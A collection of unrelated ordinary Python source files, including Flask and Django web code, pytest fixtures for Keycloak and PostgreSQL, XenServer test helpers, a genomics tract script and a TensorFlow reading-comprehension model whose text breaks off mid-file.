    player = "omx"


def play(path):
    if player == "vlc":
        subprocess.Popen(["cvlc", "--fullscreen", path])
    elif player == "omx":
        subprocess.Popen(["omxplayer", path])
import os OVERPASS = "https://overpass-api.de/api/interpreter/" DIR = os.path.dirname(os.path.abspath(__file__)) DATA_DIR = os.path.join(DIR, 'data') CACHE_DIR = os.path.join(DATA_DIR, 'cache') GEOMETRY_DIR = os.path.join(DATA_DIR, 'geometry') SPLIT_SIZE = 1.5 # optimal value for countries
"""Generate and work with PEP 425 Compatibility Tags. copied from pip-20.3.1 pip/tests/unit/test_utils_compatibility_tags.py download_url: https://raw.githubusercontent.com/pypa/pip/20.3.1/tests/unit/test_utils_compatibility_tags.py Copyright (c) 2008-2020 The pip developers (see AUTHORS.txt file) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from unittest.mock import patch import sysconfig import pytest import utils_pip_compatibility_tags @pytest.mark.parametrize( "version_info, expected", [ ((2,), "2"), ((2, 8), "28"), ((3,), "3"), ((3, 6), "36"), # Test a tuple of length 3. ((3, 6, 5), "36"), # Test a 2-digit minor version. ((3, 10), "310"), ], ) def test_version_info_to_nodot(version_info, expected): actual = utils_pip_compatibility_tags.version_info_to_nodot(version_info) assert actual == expected class Testcompatibility_tags(object): def mock_get_config_var(self, **kwd): """ Patch sysconfig.get_config_var for arbitrary keys. """ get_config_var = sysconfig.get_config_var def _mock_get_config_var(var): if var in kwd: return kwd[var] return get_config_var(var) return _mock_get_config_var def test_no_hyphen_tag(self): """ Test that no tag contains a hyphen. """ import pip._internal.utils.compatibility_tags mock_gcf = self.mock_get_config_var(SOABI="cpython-35m-darwin") with patch("sysconfig.get_config_var", mock_gcf): supported = pip._internal.utils.compatibility_tags.get_supported() for tag in supported: assert "-" not in tag.interpreter assert "-" not in tag.abi assert "-" not in tag.platform class TestManylinux2010Tags(object): @pytest.mark.parametrize( "manylinux2010,manylinux1", [ ("manylinux2010_x86_64", "manylinux1_x86_64"), ("manylinux2010_i686", "manylinux1_i686"), ], ) def test_manylinux2010_implies_manylinux1(self, manylinux2010, manylinux1): """ Specifying manylinux2010 implies manylinux1. """ groups = {} supported = utils_pip_compatibility_tags.get_supported(platforms=[manylinux2010]) for tag in supported: groups.setdefault((tag.interpreter, tag.abi), []).append(tag.platform) for arches in groups.values(): if arches == ["any"]: continue assert arches[:2] == [manylinux2010, manylinux1] class TestManylinux2014Tags(object): @pytest.mark.parametrize( "manylinuxA,manylinuxB", [ ("manylinux2014_x86_64", ["manylinux2010_x86_64", "manylinux1_x86_64"]), ("manylinux2014_i686", ["manylinux2010_i686", "manylinux1_i686"]), ], ) def test_manylinuxA_implies_manylinuxB(self, manylinuxA, manylinuxB): """ Specifying manylinux2014 implies manylinux2010/manylinux1. 
""" groups = {} supported = utils_pip_compatibility_tags.get_supported(platforms=[manylinuxA]) for tag in supported: groups.setdefault((tag.interpreter, tag.abi), []).append(tag.platform) expected_arches = [manylinuxA] expected_arches.extend(manylinuxB) for arches in groups.values(): if arches == ["any"]: continue assert arches[:3] == expected_arches
from .models import * from app import CONFIG, app from flask import escape import copy from flask_login import current_user from werkzeug.utils import secure_filename import os import requests def form_to_event_object(form): eventData = {} eventData['title'] = escape(form.title.data) eventData['description'] = escape(form.description.data) eventData['visibility'] = escape(int(form.visibility.data)) showings = [] for i in range(int(form.numShowings.data)): instanceDict = {} instanceDict["location"] = escape(form.locations.data[i]) instanceDict["start_datetime"] = str(escape(form.startDates.data[i])) + " " + str(escape(form.startTimes.data[i])) instanceDict["end_datetime"] = str(escape(form.endDates.data[i])) + " " + str(escape(form.endTimes.data[i])) showings.append(instanceDict) eventData['instances'] = showings eventData['creator'] = current_user.netid eventData['host'] = escape(form.host.data) eventData['tags'] = form.tags.data # If deletePoster field is not empty, # delete the poster field. if (form.deletePoster.data != ""): eventData["poster"] = None if (escape(form.link.data) != ""): eventData['trailer'] = escape(form.link.data) return eventData, len(showings) def make_edit_request(event_id, edits): headers = { "Authorization" : "Token %s" % current_user.token } return requests.post(CONFIG["BASE_URL"] + "/api/event/edit/"+event_id, json=edits, headers=headers) def make_delete_request(event_id): headers = { "Authorization" : "Token %s" % current_user.token } return requests.delete(CONFIG["BASE_URL"] + "/api/event/delete/"+event_id, headers=headers) def upload_file(event_id, file): if not allowed_file_type(file.filename): raise BadFileException("File must be .jpg, .jpeg, .png, or .gif.") # TODO: Some sort of resolution/file size requirement. # Currently all files are suffixed with -0. This is to make it easier for when # we support multiple images. file.filename = secure_filename(event_id+"-0."+get_file_type(file.filename)) # Compute file size. file.seek(0, os.SEEK_END) file_size = file.tell() / 1000 # Convert to kilobytes. file.seek(0, 0) if file_size > CONFIG["MAX_FILE_SIZE"]: raise BadFileException("File must not be greater than %d kB." % CONFIG["MAX_FILE_SIZE"]) url = upload_file_to_s3(file) return url
# MIT License # # Copyright (c) 2021 MrMat # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import os import logging import json import pathlib import contextlib import abc from typing import Optional, List, Dict import pytest import secrets import psycopg2 import psycopg2.sql import psycopg2.extensions from flask_migrate import upgrade from keycloak.keycloak_admin import KeycloakOpenID, KeycloakAdmin from keycloak.exceptions import KeycloakOperationError from mrmat_python_api_flask import create_app, db LOGGER = logging.getLogger(__name__) class TIException(Exception): skip: bool = False msg: str = 'An unexpected exception occurred' def __init__(self, msg: str, skip: Optional[bool] = False): self.skip = skip self.msg = msg class AbstractTestInfrastructure(abc.ABC): _app = None @abc.abstractmethod def app(self): pass @abc.abstractmethod def app_client(self): pass class NoTestInfrastructure(AbstractTestInfrastructure): @contextlib.contextmanager def app(self): self._app = create_app({ 'TESTING': True, 'SECRET_KEY': secrets.token_hex(16) }) with self._app.app_context(): upgrade(directory=os.path.join(os.path.dirname(__file__), '..', 'migrations')) db.create_all() yield self._app @contextlib.contextmanager def app_client(self): with self.app() as app: yield app.test_client() class LocalTestInfrastructure(object): """ A class for administration of the available test infrastructure """ _ti_config_path: pathlib.Path = None _ti_config: Dict = {} _pg_admin = None _keycloak_admin: KeycloakAdmin _auth_info: Dict = {} _app = None def __init__(self, ti_config_path: pathlib.Path): if not ti_config_path.exists(): raise TIException(skip=True, msg=f'Configuration at {ti_config_path} is not readable or does not exist') self._ti_config_path = ti_config_path self._ti_config = json.loads(self._ti_config_path.read_text(encoding='UTF-8')) if 'pg' not in self._ti_config or 'keycloak' not in self._ti_config: raise TIException(skip=True, msg='Missing configuration for local test infrastructure') try: self._pg_admin = psycopg2.connect(self._ti_config['pg'].get('admin_dsn')) self._keycloak_admin = KeycloakAdmin(server_url=self._ti_config['keycloak'].get('admin_url'), username=self._ti_config['keycloak'].get('admin_user'), password=self._ti_config['keycloak'].get('admin_password'), realm_name='master') except psycopg2.OperationalError: raise TIException(skip=True, msg='Failed to obtain an administrative connection to PG') except KeycloakOperationError: raise TIException(skip=True, msg='Failed to obtain an administrative 
connection to KeyCloak') @contextlib.contextmanager def app_dsn(self, role: str = 'test', password: str = 'test', schema: str = 'test', drop_finally: bool = False): try: cur = self._pg_admin.cursor() cur.execute("SELECT COUNT(rolname) FROM pg_roles WHERE rolname = %(role_name)s;", {'role_name': role}) role_count = cur.fetchone() if role_count[0] == 0: cur.execute( psycopg2.sql.SQL('CREATE ROLE {} ENCRYPTED PASSWORD %(password)s LOGIN').format( psycopg2.sql.Identifier(role)), {'password': password}) cur.execute(psycopg2.sql.SQL('CREATE SCHEMA IF NOT EXISTS {} AUTHORIZATION {}').format( psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(role))) cur.execute(psycopg2.sql.SQL('ALTER ROLE {} SET search_path TO {}').format( psycopg2.sql.Identifier(role), psycopg2.sql.Identifier(schema))) self._pg_admin.commit() cur.close() dsn_info = psycopg2.extensions.ConnectionInfo = psycopg2.extensions.parse_dsn(self._ti_config['pg']. get('admin_dsn')) app_dsn = f"postgresql://{role}:{password}@{dsn_info['host']}:{dsn_info['port']}/{dsn_info['dbname']}" yield app_dsn except psycopg2.Error: raise TIException(msg=f'Failed to create role {role} on schema {schema}') finally: if drop_finally: LOGGER.info(f'Dropping schema {schema} and associated role {role}') cur = self._pg_admin.cursor() cur.execute( psycopg2.sql.SQL('DROP SCHEMA {} CASCADE').format(psycopg2.sql.Identifier(schema))) cur.execute( psycopg2.sql.SQL('DROP ROLE {}').format(psycopg2.sql.Identifier(role))) self._pg_admin.commit() cur.close() @contextlib.contextmanager def app_auth(self, tmpdir, client_id: str = 'test-client', ti_id: str = 'ti-client', scopes: List[str] = None, scope: str = 'test-scope', redirect_uris: List = None, drop_finally: bool = False): try: if scopes is None: scopes = [] for scope in scopes: if not self._keycloak_admin.get_client_scope(scope): self._keycloak_admin.create_client_scope({ 'id': scope, 'name': scope, 'description': f'Test {scope}', 'protocol': 'openid-connect' }) if not self._keycloak_admin.get_client_id(client_id): self._keycloak_admin.create_client({ 'id': client_id, 'name': client_id, 'publicClient': False, 'optionalClientScopes': scopes }) client_secret = self._keycloak_admin.generate_client_secrets(client_id) if not self._keycloak_admin.get_client_id(ti_id): self._keycloak_admin.create_client({ 'id': ti_id, 'name': ti_id, 'publicClient': False, 'redirectUris': ['http://localhost'], 'directAccessGrantsEnabled': True, 'optionalClientScopes': scopes }) ted_secret = self._keycloak_admin.generate_client_secrets(ti_id) keycloak = KeycloakOpenID(server_url=self._keycloak_admin.server_url, client_id=ti_id, client_secret_key=ted_secret['value'], realm_name='master', verify=True) discovery = keycloak.well_know() with open(f'{tmpdir}/client_secrets.json', 'w') as cs: json.dump({ 'web': { 'client_id': client_id, 'client_secret': client_secret['value'], 'auth_uri': discovery['authorization_endpoint'], 'token_uri': discovery['token_endpoint'], 'userinfo_uri': discovery['userinfo_endpoint'], 'token_introspection_uri': discovery['introspection_endpoint'], 'issuer': discovery['issuer'], 'redirect_uris': redirect_uris } }, cs) self._auth_info = { 'client_secrets_file': f'{tmpdir}/client_secrets.json', 'client_id': client_id, 'client_secret': client_secret['value'], 'ti_id': ti_id, 'ti_secret': ted_secret['value'] } yield self._auth_info except KeycloakOperationError as koe: LOGGER.exception(koe) finally: if drop_finally: LOGGER.info(f'Deleting client_id {client_id}') self._keycloak_admin.delete_client(client_id) 
LOGGER.info(f'Deleting client_id {ti_id}') self._keycloak_admin.delete_client(ti_id) LOGGER.info(f'Deleting scope {scope}') @contextlib.contextmanager def app(self, tmpdir, pg_role: str = 'mpaf', pg_password: str = 'mpaf', pg_schema: str = 'mpaf-test', drop_finally: bool = False): with self.app_dsn(role=pg_role, password=pg_password, schema=pg_schema, drop_finally=drop_finally) as dsn, \ self.app_auth(tmpdir, scopes=['mpaf-read', 'mpaf-write']) as auth: self._app = create_app({ 'TESTING': True, 'SECRET_KEY': secrets.token_hex(16), 'SQLALCHEMY_DATABASE_URI': dsn, 'OIDC_CLIENT_SECRETS': auth['client_secrets_file'] }) with self._app.app_context(): upgrade(directory=os.path.join(os.path.dirname(__file__), '..', 'migrations')) db.create_all() yield self._app @contextlib.contextmanager def app_client(self, app_dir): with self.app(app_dir) as app: yield app.test_client() @contextlib.contextmanager def user_token(self, user_id: str = 'test-user', user_password: str = 'test', scopes: List[str] = None, drop_finally: bool = False): try: self._keycloak_admin.create_user({ 'id': user_id, 'emailVerified': True, 'enabled': True, 'firstName': 'Test', 'lastName': 'User', 'username': user_id, 'credentials': [ {'value': user_password} ] }, exist_ok=True) keycloak = KeycloakOpenID(server_url=self._keycloak_admin.server_url, client_id=self._auth_info['ti_id'], client_secret_key=self._auth_info['ti_secret'], realm_name='master', verify=True) token = keycloak.token(user_id, user_password, scope=scopes) token['user_id'] = user_id yield token finally: if drop_finally: LOGGER.info(f'Deleting user {user_id}') self._keycloak_admin.delete_user(user_id) @pytest.fixture(scope='module', autouse=False, ) def no_test_infrastructure(): """ Class-wide fixture for when no test infrastructure is available Yields: An initialised NoTestInfrastructure object """ yield NoTestInfrastructure() @pytest.fixture(scope='class', autouse=False) def local_test_infrastructure(): """ Class-wide fixture to read the configuration of locally available test infrastructure from the `TI_CONFIG` environment variable. Yields: An initialised TI object """ if 'TI_CONFIG' not in os.environ: pytest.skip('There is TI_CONFIG environment variable configuring local infrastructure to test with') yield LocalTestInfrastructure(ti_config_path=pathlib.Path(os.path.expanduser(os.getenv('TI_CONFIG'))))
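# --- Usage sketch (illustrative addition, not part of the original conftest) ---
# A hedged example of how a test module might consume the fixtures defined
# above; the '/api/healthz' route is a placeholder and may not exist in this
# application, so the example is left commented out.
#
#     def test_app_client_round_trip(no_test_infrastructure):
#         with no_test_infrastructure.app_client() as client:
#             response = client.get('/api/healthz')
#             assert response.status_code in (200, 404)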
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('exchange_portal', '0002_auto_20170124_1858'), ] operations = [ migrations.AddField( model_name='school', name='exhange_with_liu', field=models.BooleanField(default=False), ), migrations.AddField( model_name='school', name='freemover', field=models.BooleanField(default=False), ), ]
from django import forms from django.utils.translation import ugettext_lazy as _ from pretix.base.forms import SettingsForm class PublicRegistrationsForm(SettingsForm): public_registrations_items = forms.MultipleChoiceField( widget=forms.CheckboxSelectMultiple( attrs={'class': 'scrolling-multiple-choice'} ), label=_('Show public registrations for'), required=True, choices=[], ) public_registrations_questions = forms.MultipleChoiceField( widget=forms.CheckboxSelectMultiple( attrs={'class': 'scrolling-multiple-choice'} ), label=_('Publicly show answers for'), required=True, choices=[], ) public_registrations_show_attendee_name = forms.BooleanField( label=_('Show attendee name'), required=False, ) public_registrations_show_item_name = forms.BooleanField( label=_('Show product name'), required=False, ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.fields['public_registrations_items'].choices = [ (i.pk, i.name) for i in self.obj.items.all() ] self.fields['public_registrations_questions'].choices = [ (q.pk, q.question) for q in self.obj.questions.all() ]
import os from flask import Flask class ReverseProxied(object): '''Wrap the application in this middleware and configure the front-end server to add these headers, to let you quietly bind this to a URL other than / and to an HTTP scheme that is different than what is used locally. In nginx: location /myprefix { proxy_pass http://192.168.0.1:5001; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Scheme $scheme; proxy_set_header X-Script-Name /myprefix; } :param app: the WSGI application ''' def __init__(self, app): self.app = app def __call__(self, environ, start_response): script_name = environ.get('HTTP_X_SCRIPT_NAME', '') if script_name: environ['SCRIPT_NAME'] = script_name path_info = environ['PATH_INFO'] if path_info.startswith(script_name): environ['PATH_INFO'] = path_info[len(script_name):] scheme = environ.get('HTTP_X_SCHEME', '') if scheme: environ['wsgi.url_scheme'] = scheme return self.app(environ, start_response) def create_app(test_config=None): app = Flask(__name__, instance_relative_config = True) app.wsgi_app = ReverseProxied(app.wsgi_app) app.config.from_mapping( SECRET_KEY='dev', DATABASE=os.path.join(app.instance_path, 'humidifier.sqlite') ) if test_config is None: app.config.from_pyfile('config.py', silent=True) else: app.config.from_mapping(test_config) try: os.makedirs(app.instance_path) except OSError: pass from . import db db.init_app(app) from . import panel app.register_blueprint(panel.bp) app.add_url_rule('/', endpoint='index') app.add_url_rule('/reloading', endpoint='reload') from . import auth app.register_blueprint(auth.bp) return app
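# --- Hedged demo (not part of the original module) -------------------------------------
# Shows what ReverseProxied does to the WSGI environ; the inner app, environ dict and
# start_response callback below are test doubles, not real nginx traffic.
def _demo_reverse_proxied():
    captured = {}

    def inner_app(environ, start_response):
        captured['SCRIPT_NAME'] = environ['SCRIPT_NAME']
        captured['PATH_INFO'] = environ['PATH_INFO']
        captured['scheme'] = environ['wsgi.url_scheme']
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return [b'ok']

    environ = {
        'PATH_INFO': '/myprefix/panel',
        'wsgi.url_scheme': 'http',
        'HTTP_X_SCRIPT_NAME': '/myprefix',
        'HTTP_X_SCHEME': 'https',
    }
    ReverseProxied(inner_app)(environ, lambda status, headers: None)
    return captured  # {'SCRIPT_NAME': '/myprefix', 'PATH_INFO': '/panel', 'scheme': 'https'}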
""" Test helpers. """ from xenserver.models import ( AddressPool, Project, Template, XenServer, XenVM, Zone) from xenserver.tests.fake_xen_server import FakeXenServer HOST_MEM = 64*1024 HOST_CPUS = 16 VM_MEM = 2048 VM_CPUS = 1 VM_DISK = 10240 DEFAULT_SUBNET = "192.168.199.0/24" DEFAULT_GATEWAY = "192.168.199.1" class FakeXenHost(object): """ A wrapper around a single xen server and its associated API data. """ def __init__(self, hostname, xapi_version=None, mem=HOST_MEM, cpus=HOST_CPUS): xapi_version = (1, 2) if xapi_version is None else xapi_version self.hostname = hostname self.api = FakeXenServer() self.host_ref = self.api.add_host( xapi_version, mem=mem*1024*1024, cpu_info={'cpu_count': cpus}, ) self.api.add_pool(self.host_ref) self.net = {} self.pif = {} self.sr = {} def add_network(self, device, bridge, gateway=''): """ Add a network and its associated PIF. """ net = self.api.add_network(bridge=bridge) self.net[device] = net self.pif[device] = self.api.add_PIF(net, device, gateway=gateway) def add_sr(self, name, label, kind, vdis=()): """ Add an SR and optionally some VDIs. """ self.sr[name] = self.api.add_SR(label, kind) for vdi in vdis: self.api.add_VDI(self.sr[name], vdi) def get_info(self): return self.api.hosts[self.host_ref] def get_session(self): return self.api.getSession() def new_fake_host(hostname, xapi_version=None, isos=('installer.iso',)): """ Create a new fake host with default setup. """ host = FakeXenHost(hostname, xapi_version) host.add_network('eth0', 'xenbr0', gateway=DEFAULT_GATEWAY) host.add_network('eth1', 'xenbr1') host.add_sr('local', 'Local storage', 'lvm') host.add_sr('iso', 'ISOs', 'iso', isos) return host class XenServerHelper(object): def __init__(self): self.hosts = {} self.isos = ["installer.iso"] def new_host(self, hostname, xapi_version=None): """ Create a new host with default setup, including default db objects. """ host = new_fake_host(hostname, xapi_version, self.isos) self.add_existing_host(host) zone = self.db_zone("zone1") self.db_addresspool(DEFAULT_SUBNET, DEFAULT_GATEWAY, zone) xs = self.db_xenserver(hostname, zone) return (host, xs) def add_existing_host(self, host): """ Add an existing host helper to this collection. Primarily useful for nonstandard hosts. """ self.hosts[host.hostname] = host def new_vm(self, xs, name, template="default", **kw): """ Create a new vm with default setup, including default db objects. NOTE: This uses tasks.create_vm to wrangle all the xenserver objects. 
""" from xenserver import tasks template = self.db_template("default") vm = self.db_xenvm(xs, name, template, **kw) host, domain = name.split('.', 1) tasks.create_vm( vm, xs, template, host, domain, None, None, None, None) return vm def db_zone(self, name): return Zone.objects.get_or_create(name=name)[0] def db_addresspool(self, subnet, gateway, zone, version=4): return AddressPool.objects.get_or_create( subnet=subnet, gateway=gateway, zone=zone, version=version)[0] def get_db_xenserver(self, hostname): return XenServer.objects.get(hostname=hostname) def get_db_xenserver_dict(self, hostname): [xsdict] = XenServer.objects.filter(hostname=hostname).values() return xsdict def db_xenserver(self, hostname, zone, memory=HOST_MEM, mem_free=HOST_MEM, cores=HOST_CPUS, username="u", password="p"): return XenServer.objects.get_or_create( hostname=hostname, zone=zone, memory=memory, mem_free=mem_free, cores=cores, username=username, password=password)[0] def db_template(self, name, cores=VM_CPUS, memory=VM_MEM, diskspace=VM_DISK, iso="installer.iso"): return Template.objects.get_or_create( name=name, cores=cores, memory=memory, diskspace=diskspace, iso=iso)[0] def db_project(self, name): return Project.objects.get_or_create(name=name)[0] def get_db_xenvm(self, name): return XenVM.objects.get(name=name) def get_db_xenvm_dict(self, name): [vmdict] = XenVM.objects.filter(name=name).values() return vmdict def db_xenvm(self, xs, name, template, status="Running", **kw): params = { "sockets": template.cores, "memory": template.memory, } params.update(kw) return XenVM.objects.get_or_create( xenserver=xs, name=name, status=status, template=template, **params)[0] def get_session(self, hostname, username=None, password=None): return self.hosts[hostname].get_session()
# Apache License Version 2.0
# Copyright 2022 Xin Huang
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


import pandas as pd
import pybedtools


def get_tract(threshold_file, match_pct_files, output_prefix, diff):
    """
    Merge significant windows into introgressed tracts and write them as BED files.

    Parameters
    ----------
    threshold_file : str
        Tab-separated file of windows containing a boolean `significant` column.
    match_pct_files : list of str or None
        Optional pair of tab-separated match-percentage files for two source
        populations; when None, a single merged BED file is written.
    output_prefix : str
        Prefix for the output BED file(s).
    diff : float
        Match-percentage difference used to assign tracts to source 1 or source 2.
    """
    threshold_df = pd.read_csv(threshold_file, sep="\t")
    threshold_df = threshold_df[threshold_df['significant'] == True]
    cols = ['chrom', 'start', 'end']

    if match_pct_files is None:
        pybedtools.BedTool.from_dataframe(threshold_df).sort().merge().moveto(output_prefix+'.bed')
    else:
        src1_df = pd.read_csv(match_pct_files[0], sep="\t")
        src2_df = pd.read_csv(match_pct_files[1], sep="\t")
        src1_sig_df = pd.merge(src1_df, threshold_df, on=['chrom', 'start', 'end', 'sample'])
        src2_sig_df = pd.merge(src2_df, threshold_df, on=['chrom', 'start', 'end', 'sample'])
        df = pd.merge(src1_sig_df, src2_sig_df, on=['chrom', 'start', 'end', 'sample'])
        src1_df = df[df['match_pct_x']-df['match_pct_y']>diff]
        src2_df = df[df['match_pct_x']-df['match_pct_y']<diff]
        pybedtools.BedTool.from_dataframe(src1_df).sort().merge().moveto(output_prefix+'.src1.bed')
        pybedtools.BedTool.from_dataframe(src2_df).sort().merge().moveto(output_prefix+'.src2.bed')
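# --- Hypothetical invocation sketch (file names are placeholders) ----------------------
if __name__ == '__main__':
    # Two-source mode: split significant windows into src1/src2 tracts by match percentage.
    get_tract(threshold_file='windows.scores.tsv',
              match_pct_files=['src1.match_pct.tsv', 'src2.match_pct.tsv'],
              output_prefix='tracts', diff=0)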
''' This is a multi-line comment Try making one at the end of the code file The IDE (this window) tries to help by adding the ending triple quotes automatically ''' #add code below this line print("Red") print("Orange") #the comment STARTS at the hash symbol #print("Yellow"); print("Green") print("Blue") print("Indigo") print("Violet") print("These are the colors of a rainbow!"); #add code above this line
from __future__ import absolute_import from __future__ import division import time import logging import os import sys import numpy as np import tensorflow as tf from tensorflow.python.ops import variable_scope as vs from tensorflow.python.ops import embedding_ops from evaluate import exact_match_score, f1_score from data_batcher import get_batch_generator from pretty_print import print_example from modules import RNNEncoder, SimpleSoftmaxLayer, BasicAttn, masked_softmax logging.basicConfig(level=logging.INFO) class RNet(object): def __init__(self, FLAGS, id2word, word2id, emb_matrix): print 'Initializing RNet Model' self.FLAGS = FLAGS self.id2word = id2word self.word2id = word2id #TODO: ADD CHARACTER to id, etc # Add all parts of the graph with tf.variable_scope("RNet", initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0, uniform=True)): self.add_placeholders() self.add_embedding_layer(emb_matrix) self.build_graph() self.add_loss() # Define trainable parameters, gradient, gradient norm, and clip by gradient norm params = tf.trainable_variables() gradients = tf.gradients(self.loss, params) self.gradient_norm = tf.global_norm(gradients) clipped_gradients, _ = tf.clip_by_global_norm(gradients, FLAGS.max_gradient_norm) self.param_norm = tf.global_norm(params) # Define optimizer and updates # (updates is what you need to fetch in session.run to do a gradient update) self.global_step = tf.Variable(0, name="global_step", trainable=False) opt = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate) # you can try other optimizers self.updates = opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step) # Define savers (for checkpointing) and summaries (for tensorboard) self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=FLAGS.keep) self.bestmodel_saver = tf.train.Saver(tf.global_variables(), max_to_keep=1) self.summaries = tf.summary.merge_all() def add_placeholders(self): #Add placeholders to the graph. Placeholders are used to feed in inputs. # Add placeholders for inputs. # These are all batch-first: the None corresponds to batch_size and # allows you to run the same model with variable batch_size print("ADDING PLACEHOLERS") self.context_ids = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len]) self.context_mask = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len]) # Character ID's # TODO: add char max len #self.context_ids_c = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len, self.FLAGS.char_max_len]) #self.qn_ids_c = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len, self.FLAGS.char_max_len]) self.qn_ids = tf.placeholder(tf.int32, shape=[None, self.FLAGS.question_len]) self.qn_mask = tf.placeholder(tf.int32, shape=[None, self.FLAGS.question_len]) self.ans_span = tf.placeholder(tf.int32, shape=[None, 2]) # Add a placeholder to feed in the keep probability (for dropout). # This is necessary so that we can instruct the model to use dropout when training, but not when testing self.keep_prob = tf.placeholder_with_default(1.0, shape=()) def add_embedding_layer(self, emb_matrix): """ Adds word embedding layer to the graph. Inputs: emb_matrix: shape (400002, embedding_size). The GloVe vectors, plus vectors for PAD and UNK. 
character_embeddings: shape (91, 300) Pretrained character-embeddings vectors, from https://github.com/minimaxir/char-embeddings/blob/master/output/char-embeddings.txt """ print "ADDING EMBEDDINGS" with vs.variable_scope("word_embeddings"): # Note: the embedding matrix is a tf.constant which means it's not a trainable parameter e_embedding_matrix = tf.constant(emb_matrix, dtype=tf.float32, name="e_emb_matrix") # shape (400002, embedding_size) # Get the word embeddings for the context and question, # using the placeholders self.context_ids and self.qn_ids self.e_context_embs = embedding_ops.embedding_lookup(e_embedding_matrix, self.context_ids) # shape (batch_size, context_len, embedding_size) self.e_qn_embs = embedding_ops.embedding_lookup(e_embedding_matrix, self.qn_ids) # shape (batch_size, question_len, embedding_size) """ with vs.variable_scope("char_embeddings_rnn"): c_embedding_matrix = tf.constant(character_embeddings, dtype=tf.float32, name="c_emb_matrix") self.c_context_embs = embedding_ops.embedding_lookup(c_embedding_matrix, self.context_ids) # shape (batch_size, context_len, max_char_len, embedding_size) self.c_qn_embs = embedding_ops.embedding_lookup(c_embedding_matrix, self.qn_ids) # shape (batch_size, question_len, max_char_len, embedding_size) context_list = tf.split(self.c_context_embs, self.FLAGS.context_len, axis=1) #### TO DO!!!! ADD FLAGS.e_emb_dim char_emb_fwd_cell = tf.contrib.rnn.GRUCell(self.FLAGS.e_emb_dim) char_emb_back_cell = tf.contrib.rnn.GRUCell(self.FLAGS.e_emb_dim) for t in range(self.FLAGS.context_len): # Do a BiRNN for Char to get a word_char encoding unstacked_context_t = tf.unstack(context_list[t], self.FLAGS.max_char_len, axis= 1) # split ONE WORD into a list of characters # REUSE THE VARIABLES if t > 0: tf.get_variable_scope().reuse_variables() # Not sure if I should use static or dynamic output, output_fwd, output_back = tf.contrib.rnn.static_bidirectional_rnn(char_emb_fwd_cell, char_emb_back_cell, unstacked_context_t, dtype='float32') context_fwd_max = tf.reduce_max(tf.stack(output_fwd, 0), 0) # get forward embedding by max pooling """ def build_graph(self): # ENCODING unstack_context = self.e_context_embs unstack_qn = self.e_qn_embs with tf.variable_scope('encoding') as scope: # Change to dynamic bidrectional rnn # WE CAN CHANGE THE GRU LATER WITH DROPOUT OUR # ADD ENCODE SIZE emb_fwd_cell = tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size) emb_back_cell = tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size) (c_fwd, c_back), _ = tf.nn.bidirectional_dynamic_rnn(emb_fwd_cell, emb_back_cell, unstack_context, tf.reduce_sum(self.context_mask, reduction_indices=1), dtype='float32') tf.get_variable_scope().reuse_variables() (qn_fwd, qn_back), _ = tf.nn.bidirectional_dynamic_rnn(emb_fwd_cell, emb_back_cell, unstack_qn, tf.reduce_sum(self.qn_mask, reduction_indices=1), dtype='float32') u_Q = tf.concat([qn_fwd, qn_back], 2) # [batch, q_len, 2 * hidden_size] because bidirectional stacks the forward and backward u_P = tf.concat([c_fwd, c_back], 2) # [batch, c_len, 2 * hidden_size] u_Q = tf.nn.dropout(u_Q, self.keep_prob) u_P = tf.nn.dropout(u_P, self.keep_prob) # GATED ATTENTION v_P = [] # All attention states across time # each element of v_P is an attention state for one time point with dim [batch_size, hidden_size] print "Gated 